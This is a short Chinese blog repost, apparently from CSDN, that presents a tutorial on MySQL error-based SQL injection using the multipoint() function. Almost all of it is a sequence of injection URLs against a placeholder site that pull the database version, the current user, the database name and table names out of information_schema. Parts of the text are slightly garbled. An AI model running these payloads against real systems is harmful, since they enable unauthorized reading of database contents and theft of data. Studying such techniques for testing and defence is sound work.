【漏洞挖掘】——113、multipoint报错注入深入刨析(multiple endpoints may not be)

【漏洞挖掘】——113、multipoint报错注入深入刨析multipoint报错注入流程
获取数据库版本信息 http://www.example.com/?id=1\’ and multipoint((select * from (s

multipoint报错注入流程

获取数据库版本信息

http://www.example.com/?id=1\’ 和multipoint((select * from (select * from(select version())a)b)) –+

获取用户名相关信息

http://www.example.com/?id=1\’ andmultipoint((select * from (select * from(select user())a)b)) –+

获取数据库名的信息

http://www.example.com/?id=1\’ andmultipoint((select * from (select * from(select Database())a)b)) –+

获取数据库的表信息

查询第一个表名的信息。

http://www.example.com/?id=1\’ andmultipoint((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 0,1)a)b)) –+

查询第二个表名的信息。

http://www.example.com/?id=1\’ andmultipoint((select * from (select * from(select table_name from information_schema.tables where table_schema=database() limit 1,1)a)b)) –+

其余部分是使用变量限制x 和y 中的x 值获得的。

#【漏洞挖掘】——113及以上多点错误注入详细分析相关内容来源网络,仅供参考。相关信息请参见官方公告。

原创文章,作者:CSDN,如若转载,请注明出处:https://www.sudun.com/ask/91191.html

(0)
CSDN's avatarCSDN
上一篇 2024年6月21日 下午6:51
下一篇 2024年6月21日 下午6:51

相关推荐

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注